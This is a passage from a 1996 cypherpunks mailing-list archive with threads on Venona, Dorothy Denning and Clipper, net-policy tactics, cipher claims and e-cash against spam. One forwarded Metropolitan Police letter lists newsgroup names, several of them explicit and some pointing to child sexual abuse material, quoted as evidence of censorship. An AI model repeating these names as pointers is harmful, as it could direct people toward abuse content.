>the National Cryptologic Museum in MD.

Kahn's "Codebreakers" also has photos of OTPs captured from undercover
Soviet spies. The fact that illegals were using OTPs to talk to their
controllers didn't necessarily imply that messages from Soviet embassies
and other offices needed to be using OTPs themselves. The could have used a
good rotor machine (well, good for the era). But now I'm convinced they
didn't.

The whole thing makes sense if we're looking at cryptanalysis based on
reused OTPs. I can see why the NSA doesn't mind letting the world know that
they could crack reused OTPs as opposed to some other identifiable cipher
technique. The degree of NSA's success doesn't help an adversary optimize
their crypto technology. The decryption success is in direct proportion to
how sloppy the Soviets were in using their OTPs. I'll bet some official got
shot when this was all figured out.

Partial decrypts occur when parts of the keystream are recovered and other
parts are not. I wonder if one could compare the "holes" in the various
messages and thereby infer which OTPs were used for which messages based on
patterns of keystream recovery.

Venona also presents an object lesson on why not to use OTPs: the security
does not degrade gracefully if they are misused. Reusing one even once
could easily compromise both messages sent with it. I doubt security
degrades nearly as quickly if you overuse or reuse keys in more modern
techniques. Thus, OTP keying requires a reliably pessimistic prediction of
traffic flow, and your security is toast if you underestimate your
transmission needs.

Besides, given that nobody can crack a truly randomized OTP, I can see why
NSA would want to publicize a failed use of OTPs. Might as well focus
interest on more theoretically tractable techniques.

Rick.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Wed, 28 Aug 1996 00:58:50 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Denning interview in Wired
In-Reply-To: <199608261817.LAA03556@netcom11.netcom.com>
Message-ID: <Pine.SOL.3.91.960827100044.4214E-100000@echonyc.com>
MIME-Version: 1.0
Content-Type: text/plain



This was not an interview, but an article.  Though all quotes are 
accurate (and checked with the source) it was me who did the choosing, so 
it's really not fair to fault Dorothy for not addressing issues x and y, 
etc.For a more comprehensive defense of her position you can go to her 
web site, where she has lotsa position papers.

Incidentally, I didn't set out to rehash the Clipper issues in the 
article, but to try to give some insight into Dorothy herself. 

On Mon, 26 
Aug 1996, Vladimir Z. Nuri wrote:

> don't recall anyone mentioning this--
> Steven Levy did a lengthy piece on Dorothy Denning for the
> recent Wired. 
> 
> any reactions?
> 
> I was personally struck at how Dorothy seems to lack strong
> convictions that hold up in the face of others. she wrote
> a paper urging that hackers be studied and worked with by
> the security community and then backed away from the position
> quickly after talking to "authorities".
> 
> 
> I was amazed that Dorothy, after a long time, has failed to
> confront some very basic issues in her advocation of 
> Clipper:
> 
> 1. constitutional issues. it would be ok for me if she described
> why she thinks that privacy is not constitutionally protected,
> but she fails to mention constitutionality issues in virtually
> any of her writings. frankly this strikes me as the utmost
> weasely evasion. is she aware of any court precedent on freedom
> of speech, freedom to speak in private etc? she never quotes
> any case law etc.
> 
> 2. she fails to address the issue of "returns vs. cost" or
> "cost/benefit" ratio. her argument amounts to an extremely
> simplistic line, "law authorities have been stymied by crypto. therefore
> it should be restricted". but this reminds me of speed limit
> advocates saying, "55 saves lives". well, how many? 35 saves lives
> over 55. the key issue is that of *compromise*: what is the optimum
> compromise?  we can catch more criminals by adding security cameras
> everywhere, but what are the costs? 
> 
> such back-and-white thinking has 
> little place in any complex policy issue, yet unfortunately tends to 
> dominate them. it's very bizarre to see an academic like Denning
> just seem to be vacuously oblivious to such simple concepts such
> as "tradeoffs". nothing I've read suggests she has ever addressed
> the issue of *compromise* in regard to catching criminals vs.
> protecting rights.
> 
> but amazingly, people like Kallstrom seem to think the same way.
> paraphrased, "if even one criminal gets away because we didn't have enough
> funding in the FBI, we need more funding in the FBI" etc.
> 
> 3. she fails to address the "big brother" issue. why is wiretapping
> never going to be used by "big brother"? it's inconceivable to me
> how she can honestly evade this issue as well. she has never addressed
> the issue of abuse by law authorities from what I can tell.
> 
> 4. Denning seems to be to be remarkably swayed by "authority figures".
> she has changed her opinion before based merely on conversations 
> with "authority figures" in the FBI and NSA. it seems maybe she has
> a bit of "spook envy" or something like that. many of her arguments
> for me essentially amount to, "people that claim to know what they
> are doing say we need [x], therefore we need [x]"
> 
> 
> well, I am not trying to start a new round of Denning-bashing 
> (although that's always fun, hee, hee) but the recent article does
> give a little new food for thought about Denning's psychology etc.
> 
> frankly I think that Denning has lost the intellectual battle because
> she absolutely fails to address some of the above key points. (particularly
> the total failure to address the constitution is getting more egregious). I 
> suggest that anyone who wants to debunk her line of thinking (which apparently
> is getting to be awfully easy) just focus on any of the above areas.
> she apparently has no reponse to these points in anything I have
> read of hers.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 28 Aug 1996 05:36:40 +0800
To: cypherpunks@toad.com
Subject: Cato Institute conference on Net-regulation, 9/20/96
Message-ID: <Pine.SUN.3.91.960827095919.19005E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


This should be a good half-day conference, with some interesting 
speakers. I'll probably show up for Charles Platt's keynote.

Naturally, it's being held in the building's Hayek Auditorium. Hayek has 
some relevance to cypherpunks, I think -- he warned early on that the 
loss of economic freedom inevitably leads to the loss of civil liberties 
as well.

He also described the phenomenon of spontaneous order (admittedly in the 
context of markets), which speaks to the way the Net has ordered itself.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


---------- Forwarded message ----------
Date: Tue, 27 Aug 1996 12:05:44 -0400
From: Solveig Bernstein <sberns@cato.org>
To: fight-censorship@vorlon.mit.edu

Please redistribute this conference announcement freely:


*********************************************************
Regulation or Private Ordering?  The Future of the Internet

The Cato Institute cordially invites you to a morning conference and luncheon 

Regulation or Private Ordering?
The Future of the Internet

Friday, September 20, 1996
8:30 a.m.   1:30 p.m.

The Cato Institute's F.A. Hayek Auditorium 
1000 Massachusetts Avenue, N.W. 
Washington, DC

The Internet promises users unprecedented individual control over
information. It is at once a tool for universal communication, a new form of
media, and a new way of doing business. But it is also a challenge to
lawmakers and regulators. Existing laws cannot easily be applied to the
Internet and appear doomed to failure. Do we need a new set of laws or will
voluntary private action ensure order on the information superhighway?
 
Cato's Regulation or Private Ordering? The Future of the Internet conference
will bring together leading authorities on law, regulation, and technology
to discuss the problems of adapting existing law to the Internet and to
explore private alternatives to regulation. Can private ordering consistent
with individual   
freedom forestall a government backlash against perceived Internet chaos?

The cost of this conference is $25.00.

Registration   Wintergarden 

8:30   8:35   a.m.	Lawrence Gasman   Welcoming Remarks
				Director, Telecommunications and Technology 				Studies, Cato Institute

8:35   9:20   a.m. JURISDICTIONAL BOUNDARIES

David Post;Collective Action in Cyberspace&quot; Georgetown University Law
Center

Dan Burk   Federalism without Borders; Seton Hall University School of Law

9:20   10:30 a.m. FEDERAL REGULATORY ISSUES

Robert Crandall; Rate Regulation and Arbitrage; Internet Telephony;
Brookings Institution
 
Trotter Hardy;Congress and Digital Copyright: Avoiding a Balancing
Act;William & Mary College of Law

Lori Fena;Security of Personal and Corporate Information Online: Moving
toward Industry Self Regulation; Electronic Frontier Foundation

10:30   10:45 a.m. Break

10:45   11:55 a.m. FREE SPEECH IN CYBERSPACE

Danny Weitzner; The Empowered User: Internet Technology Tools for Limiting
Access to Unwanted Material; Protecting Privacy; Center for Democracy and
Technology

Eugene Volokh;Private Online Speech Controls: Censorship, Constitutionally
Protected Editing, or Both? University of California at Los Angeles School
of Law

David Sobel;Prospects of the CDA in the Supreme Court; Electronic Privacy
Information Center

12:30 p.m. Keynote Address - Charles Platt; Net Futures: Scary and Sublime;
Author, Free Zone, The Silicone Man, Contributing Writer, Wired Magazine

12:30 p.m. Luncheon

News media please call Robin Hulsey at (202) 789 5293.
  
To Register, please e-mail Scott Wallis at swallis@cato.org, or vist our web
site at //www:cato.org.
**********************************************************************
Solveig Bernstein, Esq.
(202) 789-5274
(202) 842-3490 (fax)

Assistant Director of Telecommunications & Technology Studies
Cato Institute
1000 Mass. Ave. NW
Washington, DC 20001





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 28 Aug 1996 05:52:00 +0800
To: Steven Levy <steven@echonyc.com>
Subject: Re: Denning interview in Wired
In-Reply-To: <Pine.SOL.3.91.960827100044.4214E-100000@echonyc.com>
Message-ID: <199608271723.KAA23960@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



SL:
>This was not an interview, but an article.  Though all quotes are 
>accurate (and checked with the source) it was me who did the choosing, so 
>it's really not fair to fault Dorothy for not addressing issues x and y, 
>etc.

hey, cut me some slack. you did specifically "interview" her for the article,
(I'm remembering the part where you say
you pressed for details about how clipper would improve the world, and
she came back talking about how she got locked out of a swim locker in 
her wet bathing suit, hee, hee). it's not an interview in the sense that 
you are  directly quoting her the whole article, but I'd say it would be
fair to call it an interview. article, whatever, I don't care.

also, I was not claiming that Denning failed to address particular
issues in the article alone (which I agree would not be totally
fair, with only one "sample"). I've read a lot of her writing and
talking and am pointing out that she doesn't volunteer any info
on the points I mentioned (constitutionality etc.) in general, 
even when pressed, and that your article fits into suggesting this pattern 
of evasion of certain points on her part. 

did she talk to you about any of the issues I mentioned in 
my post? if so, I would have suspected you would have included them
in the article. in any case, even on her own and when directly
challenged, she avoids the key issues I mentioned to a degree that
for me approaches intellectual sloppiness or even dishonesty. 

the article imho correctly
conveys the reality that Denning, even after being the poster-girl
for Clipper, wiretapping, and key escrow, has failed to take into
account or address the key devastating counterpoints of her opposition, and 
still at this late date has great difficulty explaining why "all the above"
is a good thing and desirable, despite endless opportunity to boil
her stance into effective soundbites.

>For a more comprehensive defense of her position you can go to her 
>web site, where she has lotsa position papers.

fair enough. I challenge anyone to show how she's addressed the
points I mentioned. I'm simply pointing out a pattern I've noticed
in her thinking of which your own article is another confirmation,
but not the sole basis for the claim.

>Incidentally, I didn't set out to rehash the Clipper issues in the 
>article, but to try to give some insight into Dorothy herself. 

which you did. that's why I said in my post, it gives interesting
fodder for psychogical insights of Denning's position.

I don't know why you seem to be defensive about the article
in your response when I said nothing critical of your own role.

I guess I didn't make it clear I thought it was a fine
article and thought you did a commendable job, and I've always
been a big fan, if you care about my opinion in the matter <g>

there are other places in the article where I do sense a bit of a 
subtle bias against Denning, especially in the last paragraph, but
overall I thought it was very objective. it seems to me it would
be hard to write an objective article about Denning that didn't
raise doubts in the readers mind (i.e. by carefully avoiding all
mention of her opponents etc.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Wed, 28 Aug 1996 01:25:52 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Net Politics
Message-ID: <v02140b04ae48a9eadc87@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 PM 8/26/96, Declan McCullagh wrote:
>Jonah,
>
>I had expected some negative feedback from CDT, but I should say I was
>surprised by the tenor of your response.

I am going to try and resist the tasty-looking flame bait you have dangled
in front of me here because we both have more important things to deal
with, and because Seth Finkelstein summed up this argument perfectly:

"One more round of 'work within the system' vs 'up against the wall!'," he
said.

This is an important debate that unfortunately seems to be dividing the
net.community when we most need to be united. All of us working on
net-policy issues share a common vision and goals - promoting the free flow
of information, preserving and enhancing First Amendment values and
protecting individual privacy. There are, for better or worse, many
different views on the best way to accomplish those objectives, and the
debate over who has the right tactics seems to frequently escalate in to
religious war.

Meanwhile, our opponents are well organized, determined, and do a much
better job of keeping their internal strategic differences to themselves.
Perhaps this is part of the reason they keep kicking our butts all over
town.

Jonah

  ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT **
      It's not too late to be a part of history -- Join the Lawsuit
         <http://www.cdt.org/ciec>   --    <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
PGP Key via finger                                     (v) +1.202.637.9800
http://www.cdt.org/                                    (f) +1.202.637.0968
http://www.cdt.org/homes/jseiger/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baby-x@cyberpolis.org (baby-X)
Date: Wed, 28 Aug 1996 06:07:21 +0800
To: jseiger@cdt.org (Jonah Seiger)
Subject: Re: Net Politics
Message-ID: <v01540b00ae48e087022c@[206.14.141.118]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 AM 8/27/96, Jonah Seiger wrote:

>This is an important debate that unfortunately seems to be dividing the
>net.community when we most need to be united. All of us working on
>net-policy issues share a common vision and goals - promoting the free flow
>of information, preserving and enhancing First Amendment values and
>protecting individual privacy. There are, for better or worse, many
>different views on the best way to accomplish those objectives, and the
>debate over who has the right tactics seems to frequently escalate in to
>religious war.

Not an unusual thing online (Windows! Mac! Windows! Mac! Linux!).

>Meanwhile, our opponents are well organized, determined, and do a much
>better job of keeping their internal strategic differences to themselves.
>Perhaps this is part of the reason they keep kicking our butts all over
>town.

I swer I had this conversation somewhere recently, and those of us involved
in it came up with one reason this rift seems to come up so often and get
discussed so publically, especially in comparison to our "organized,
determined" opponents. I would hazard a guess that those people working
within the cause of electronic freedoms tend not to be the simple
order-following, authority-heeding sort (compared to, say, followers of the
Religious Right). It's easy if you're Ralph Reed to send out a flyer or get
the telemarketters working and tell the troops what to do. It's not as easy
if you're, say, Jonah Seiger. Not because of Jonah (or Shabbir, or Declan,
or whoever), but because of his audience. It's not a push-button response
with us.

And I'm still not convinced (as I wasn't last year when I was more heavily
involved in some of this) that these differences of opinion have to somehow
be kept behind-closed-doors. That has always stuck me as the way -they- do
it (if I can stoop to using a Them for a moment), and never as a way that
was inherently required.

It's like the Gulf War or something. "Hey, we're at war, stop criticising,
we need to be united!" Hogwash.



-----------------------------------------------[ Christopher D. Frankonis ]---
--------------------------------------------------[ baby-x@cyberpolis.org ]---






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Wed, 28 Aug 1996 02:01:27 +0800
To: cypherpunks@toad.com
Subject: Australian Interbet Betting System Gets US Interest 08/26/96
Message-ID: <2.2.32.19960827150324.0076792c@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


  	  				 
>ALICE SPRINGS, AUSTRALIA, 1996 AUG 26 (NB) -- An American from Washington  
>DC has placed the first "Interbet" on the Australian Football League (AFL), 
>$250 for a win on North Melbourne to beat Geelong, with Alice Springs 
>bookmaker CentreBet which switched on its net-based computer betting 
>service last week. 
>
>CentreBet has taken more than 70 bets on the Internet since launching the  
>worldwide service, approved by the Northern Territory Racing and Gaming 
>Authority. Alice Springs, colloquially known as "The Alice," is a small 
>community close to Ayers Rock in the central outback of Australia where 
>people are few and betting is a way of life. 
>
>CentreBet's Gerard Daffy told the Australian Associated Press news service  
>he expects keen Interbet interest from Asians who are big fans of English 
>soccer and also from Americans whom he expects to bet on a variety of major 
>sporting events, starting with this week's US Open tennis and the upcoming 
>NFL season. 
>
>However the AFL bet from America came right out of left field (AFL, or  
>Australian Rules football, a descendant of Ireland's Gaelic football, is 
>played seriously only in several Australian States, but is shown regularly 
>on some US cable-TV services). "The guy who put the bet on North Melbourne 
>is part of an Australian Rules fan club in the US," said Daffy. "There's 
>another American in Michigan who has opened an Interbet account to bet on 
>the AFL as well." 
>
>For the record: the fan who bet on North Melbourne can forget his $250.  
>Geelong downed North Melbourne at the Melbourne Cricket Ground on Saturday 
>by 109 points to 96. 
>
>CentreBet can be reached at http://www.taunet.com.au/centrebet  
>
>(19960826)   	
>  	   	
>
>
_______________________
Regards,            Politics is the art of preventing people from taking 
                    part in affairs which properly concern them. -Paul Valery
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 28 Aug 1996 04:42:29 +0800
To: adam@homeport.org (Adam Shostack)
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608270158.UAA24640@homeport.org>
Message-ID: <199608271620.LAA10933@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Adam Shostack wrote:
> 
> A few weeks back, I posted a request for source code review
> guidelines.  I got about 50 me-toos, but no guidelines.  So I wrote
> some I think are decent.  They're still in draft format.  I'd
> appreciate feedback & commentary on them.
> 
> http://www.homeport.org/~adam/review.html
> 

Thanks for an interesting paper.

In part " V.Code (Security Issues)/3.Data Checking" you say the following:

`` Data coming in to Acme Widgets should be checked very carefully for
        appropriateness. This check should be to see if the data is what
        is expected (length, characters). Making a list of bad
        characters is not the way to go; the lists are rarely complete.
        A secure program should know what it expects, and reject other
        input. (For example, if you are looking for an email address,
        don't check to see if it contains a semi-colon or a newline,
        check to see if it contains anything other than a [A-Za-z0-9._]
        followed by an @, followed by a hostname [A-Za-z0-9._].)''
END QUOTE

That is not entirely correct. An email address is much more than
that, it can contain "!", several "@" characters (not next to each other
though), "%", and so on. x400 mail addresses (?) can contain "/", "=",
and all emails can have "+" and "-" and "_" in them. 

Some of the valid email addresses are

user_name@company.com
alex+@pitt.edu
mi%aldan.UUCP@algebra.com
user%host.domain@anon.penet.fi
host1!host2!user

Look at your sendmail.cf file for a humongous amount of 
email parsing rules.

Thanks for an excellent document though, I put a link to it from my
intranet page.

	- Igor "Code Obscurity Creates Job Security" Chudov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Tue, 27 Aug 1996 22:53:41 +0800
To: cypherpunks@toad.com
Subject: Net Censorship in the Uk
Message-ID: <Pine.SUN.3.93.960827124127.16748C-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



You may have seen this already.  If so apologies.  However, it is a
blatant example of police oppression and stupidity.  If nothing else, just
imagine how much of the taxpayers' money it cost to decide
whether alt.binaries.erotica.fetish.feet contravenes the Obscene
Publications Act 1959.


Sean Gabb
Editor
Free Life

---------- Forwarded message ----------
Date: Mon, 26 Aug 96 15:44:45 BST
From: Sean Gabb <cea01sig@gold.ac.uk>
To: cea01sig@gold.ac.uk
Subject: theMet.html


  LETTER FROM THE METROPOLITAN POLICE
  
   
     _________________________________________________________________
   
   
   

METROPOLITAN POLICE SERVICE

Clubs and Vice Unit
Charing Cross Police Station
Agar Street
London WC2N 4JP

Telephone: 0171 321 7752
Facsimile:   0171 321 7762

To: All Internet Service Providers





Dear Sir / Madam

Pornographic Material on the Internet

Further to the seminar held at New Scotland Yard on 2nd August I enclose,
as promised by Superintendent Mike Hoskins, a list of those Newsgroups
which we believe contain pornographic material.

We have attempted to confirm that the Newsgroups listed currently contain
this offensive material but as you will be only too aware the content is
continually changing and you will need to satisfy yourself about the
nature and content before taking any action. Furthermore, this list is
not exhaustive and we are looking to you to monitor your Newsgroups
identifying and taking necessary action against those others found to
contain such material. As you will  be aware the publication of obscene
articles is an offence.

This list is only the starting point and we hope, with the co-operation
and assistance of the industry and your trade organisations, to be moving
quickly towards the eradication of this type of Newsgroup from the
Internet. At the seminar we debated the means of maintaining an up to
date list and you will recall that ISPA volunteered to pool information
and assist in this initiative. However, we are very anxious that all
service providers should be taking positive action now, whether or not
they are members of a trade association.

We trust that with your co-operation and self regulation it will not be
necessary for us to move to an enforcement policy.

Yours Faithfully


Stephen French
Chief Inspector


List
alt.binaries.pictures.boys
alt.binaries.pictures.child.erotica.female
alt.binaries.pictures.child.erotica.male
alt.binaries.pictures.children
alt.binaries.pictures.erotic.children
alt.binaries.pictures.erotica child
alt.binaries.pictures.erotica.child.female
alt.binaries.pictures.erotica.child.male
alt.binaries.pictures.erotica.children
alt.binaries.pictures.erotica.lolita
alt.binaries.pictures.erotica.pre-teen
alt.binaries.pictures.erotica.teen.fuck
alt.binaries.pictures.erotica.young
alt.binaries.pictures.lolita.fucking
alt.binaries.pictures.lolita.misc
alt.sex.boys
alt.sex.children
alt.sex.fetish.tinygirls
alt.sex.girls
alt.sex.incest
alt.sex.intergen
alt.sex.pedophile.mike-labbe
alt.sex.pedophilia.
alt.sex.pedophilia.boys
alt.sex.pedophilia.girls
alt.sex.pedophilia.swaps
alt.sex.pedophilia.pictures
alt.sex.pre-teens
alt.sex.teens
alt.sex.weight-gain 0000000928 0000000418 y
alt.fan.cock-sucking 0000001482 0000001311 y
alt.binaries.pictures.voyeurism 0000005117 0000004495
alt.binaries.pictures.lolita.fucking 0000001097 00000861 y
alt.binaries.pictures.erotica.voyeurism 0000011396 0000010495 y
alt.binaries.pictures.erotica.young 0000006499 0000005208 y
alt.binaries.pictures.erotica.uniform 0000001274 0000001110 y
alt.binaries.pictures.erotica.urine 0000005542 0000004911 y
alt.binaries.pictures.erotica.teen.fuck 0000003398 0000003162 y
alt.binaries.pictures.erotica.uncut 0000002220 0000001970 y
alt.binaries.pictures.erotica.spanking 0000005484 0000004927 y
alt.binaries.pictures.erotica.teen.female.masturbation 0000003770
0000003085 y
alt.binaries.pictures.erotica.pornstars 0000010919 0000010192 y
alt.binaries.pictures.erotica.pre-teen 0000004945 0000004100 y
alt.binaries.pictures.erotica.oral 0000013599 0000012668 y
alt.binaries.fetish.scat 0000000958 0000000842 y
alt.binaries.pictures.erotic.anime 0000001886 0000001724 y
alt.binaries.pictures.erotic.centerfolds 0000015743 0000014219 y
alt.binaries.pictures.erotic.senior-citizens 0000004426 0000003944 y
alt.binaries.pictures.erotica.animals 0000001511 0000001403 y
alt.binaries.pictures.erotica.art.pin-up 0000003274 0000002916 y
alt.binaries.pictures.erotica.breasts.small 0000004812 0000004400 y
alt.binaries.pictures.erotica.butts 0000010763 0000010048 y
alt.binaries.pictures.erotica.cheerleaders 0000010297 0000009498 y
alt.binaries.pictures.erotica.disney 0000001471 0000001281 y
alt.binaries.pictures.erotica.fetish.feet 0000008454 0000007840 y
alt.binaries.pictures.erotica.fetish.hair 0000003162 0000002804 y
alt.binaries.pictures.erotic.senior-citizens 0000004042 0000003695 y
alt.binaries.pictures.erotica.teen 0000005349 0000005098 y
alt.binaries.pictures.erotica.male.anal 0000004414 0000004164 y
alt.sex.pedophile.mike-labbe 0000001015 0000000752 y
alt.sex.masturbation 0000004038 0000002204 y
alt.sex.fetish.tickling 0000014620 0000011227 y
alt.sex.fetish.waifs 0000007005 0000005391 y
alt.sex.fetish.watersports 0000015798 0000012599 y
alt.sex.fetish.wrestling 0000008522 0000006281 y
alt.sex.first-time 0000007333 0000005072 y
alt.sex.fetish.girl.watchers 0000006418 0000003795 y
alt.sex.homosexual 0000025299 0000020411 y
alt.sex.incest 0000016099 0000009889 y
alt.sex.intergen 0000012715 0000010756 y
alt.sex.jp 0000003101 0000002194 y
alt.sex.magazines 0000016261 0000012956 y
alt.sex.masturbation 0000066212 0000058405 y
alt.sex.movies 0000090182 0000084718 y
alt.sex.necrophilia 0000003469 0000002177 y
alt.sex.pedophilia 0000040531 0000026257 y
alt.sex.pictures 0000120660 0000097707 y
alt.sex.pictures.female 0000091859 0000067880 y
alt.sex.pictures.male 0000040412 0000032695 y
alt.sex.services 0000038170 0000032355 y
alt.sex.spam 0000000717 0000000283 y
alt.sex.spanking 0000043401 0000037424 y
alt.sex.stories 0000130604 0000115635 y
alt.sex.strip-clubs 0000035850 0000030078 y
alt.magazines.pornographic 0000005618 0000003705 y alt.magick.sex
0000007227 0000006197 y
alt.personals.spanking.punishment 0000006983 0000005028 y
alt.sex. 0000318682 0000299098
alt.sex.anal 0000028283 0000020514 y
alt.sex.bestiality 0000039473 0000035720 y
alt.sex.bondage 0000175209 0000162338 y
alt.sex.breast 0000035836 0000029671 y
alt.sex.enemas 0000009235 0000007242 y
alt.sex.exhibitionism 0000046981 0000035201 y
alt.sex.fat 0000015956 0000013563 y
alt.sex.fetish.diapers 0000012816 0000010872 y
alt.sex.fetish.fa 0000015012 0000010470 y
alt.sex.fetish.feet 0000025850 0000022025 y
alt.sex.fetish.hair 0000011779 0000010356 y
alt.sex.fetish.orientals 0000047159 0000044315 y
alt.binaries.multimedia.erotica 0000094765 0000092313
alt.binaries.pictures.boys 0000025827 0000025062 y
alt.binaries.pictures.children 0000009753 0000009586 y
alt.binaries.pictures.erotica 0000387356 0000382534 y
alt.binaries.pictures.erotica.amateur.d 0000012832 0000012505 y
alt.binaries.pictures.amateur.female 0000104107 0000100909 y
alt.binaries.pictures.amateur.male 0000020070 0000019186 y
alt.binaries.pictures.erotica.anime 0000031144 0000030438 y
alt.binaries.pictures.erotica.bestiality 0000022378 0000021836 y
alt.binaries.pictures.erotica.blondes 0000061623 0000059763 y
alt.binaries.pictures.erotica.bondage 0000060612 0000058636 y
alt.binaries.pictures.erotica.cartoons 0000023721 0000023233 y
alt.binaries.pictures.erotica.female 00000155979 0000152810 y
alt.binaries.pictures.erotica.furry 0000007251 0000007021 y
alt.binaries.pictures.erotica.gaymen 0000047272 0000045207 y
alt.binaries.pictures.erotica.male 0000137705 0000135723 y
alt.binaries.pictures.erotica. orientals 0000096484 0000094139 y
alt.binaries.pictures.erotica.pregnant 0000000038 0000000039 m
alt.binaries.pictures.erotica.teen 0000048099 0000046561 y
alt.binaries.pictures.erotica.teen.d 0000005063 0000004755 y
alt.binaries.pictures.girlfriend 0000029946 0000029100 y
alt.binaries.pictures.girlfriends 0000055197 0000053838 y
alt.binaries.pictures.girl 0000022149 0000021105 y
alt.binaries.pictures.horny.nurses 0000001839 0000001704 y
alt.binaries.pictures.pictures.nudism 0000032432 0000031050 y
alt.binaries.pictures.tasteless 0000036867 0000036442 y
alt.homosexual 0000080096 0000072533 y
alt.sex.swingers 0000027930 0000020021 y
alt.sex.telephone 0000027530 0000021705 y
alt.sex.trans 0000015985 0000011104 y
alt.sex.wanted 0000082382 0000071809 y
alt.sex.watersports 0000005838 0000003666 y
alt.sex.bestiality.pictures 0000000791 0000000300 y
alt.sex.children 0000001311 0000000690 y
alt.sex.cu-seeme 0000001049 0000000273 y
alt.sex.fetish.scat 0000002756 0000001143 y
alt.sex.fetish.tinygirls 0000003322 0000001229 y
alt.sex.fetish.wet-and-messy 0000003209 0000001432 y
alt.sex.oral 0000007820 0000003177 y
alt.sex.orgy 0000004025 0000001330 y
alt.sex.pedophilia.girls 0000001130 0000000267 y
alt.sex.pedophilia.pictures 0000001138 0000000276 y
alt.sex.pictures.d 0000005114 0000002086 y
alt.sex.stories.gay 0000002918 0000000997 y
alt.sex.stories.tg 0000001831 0000001078 y
alt.sex.super-size 0000001987 0000000711 y
alt.sex.tasteless 0000001003 0000000202 y
alt.sex.teens 0000002394 0000000540 y
alt.sex.video-swap 0000001363 0000000489 y
alt.binaries.pictures.erotica.black.male 0000012581 0000012054 y
alt.binaries.pictures.erotica.children 0000005812 0000005117 y
alt.sex.sm.fig 0000006729 0000004915 y


   
     _________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 28 Aug 1996 06:45:30 +0800
To: "JOHN E. HOLT" <76473.1732@compuserve.com>
Subject: Re: The POUCH
Message-ID: <3.0b11.32.19960827120805.00bb8714@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:44 PM 8/26/96 EDT, JOHN E. HOLT wrote:
>The Pouch uses a 64 x 64 block product cipher, a 1024 bit random initialization
>vector and the CBC technique.  Most experts agree that such an
implementation >is highly resistant to all forms of cryptographic attack.

That depends highly on the cypher.  Also depends on if your "initialization
vector" is truly random.  (Or even close, as some other companies have found
in the past...)

It is resistant to all attacks that you know of.  Depending on the nature of
the algorythm, this could be true in some sense, false in some sense and
meaningless in some sense.  Without published code, it is meaningless in all
senses.

>Hellman and Dilfie rely on knowing the algorithm for their known plain text
>attacks
>An unpublished algorithm forces them into reverse engineering the computer
>programs to learn the algorithm. The POUCH has many roadblocks built in
>to prevent this.

As someone who has spent time reverse engeneering code, I find this one
pretty funny.  The only thing I have found that will obscure code in any
real fashion is writing it badly.  "Roadblocks" to reverse engeneering also
tend to be a speed hit.  Either way, it will not stop someone with the
proper skills and tools.

>I refer to Cummings, Cryptography and Data Security pages 150 and 98 in
this >regard.

Do we have to read them in reverse order or is that part of the roadblock
you are using to make things more difficult...?

I will be interested to see just what kind of liability problems you run
into when this thing gets compromised.  Of course, with a name like "The
Pouch", you will probibly just claim it was a "kangaroo court".
---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Wed, 28 Aug 1996 05:41:46 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: Spamming
Message-ID: <2.2.32.19960827180935.008cd398@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 09:27 PM 8/26/96 -0800, Adamsc wrote:
>On Mon, 26 Aug 1996 13:26:04 -0500, John Deters wrote:
>
>>>What do cypherpunks think about the following practice or law (I realize
>>>that it may be impossible to implement): each email message should carry
>>>a little digicash check for, say, 20 cents. Mail reading programs should
>>>reject (send back unread) all messages not carrying these digital
>>>checks, unless the senders are in the "friends list". The MUAs should
>>>ask users whether they want to "cash" the digital check or not.
>>
>>I do not believe it is possible to have a secure executable that exists on
>>an uncontrolled user's machine.  "Tamperproof" encryption chips still
>>require communications in and out from the user's program.  A determined
>>attacker could continue to use the pieces of their code that talk to the
>>encryption chip.
>
>>Never underestimate the allure of "free money" when you're planning to >give
>>it away.
>
>Methinks you don't understand e-cash.  It's not executable, and uses public key
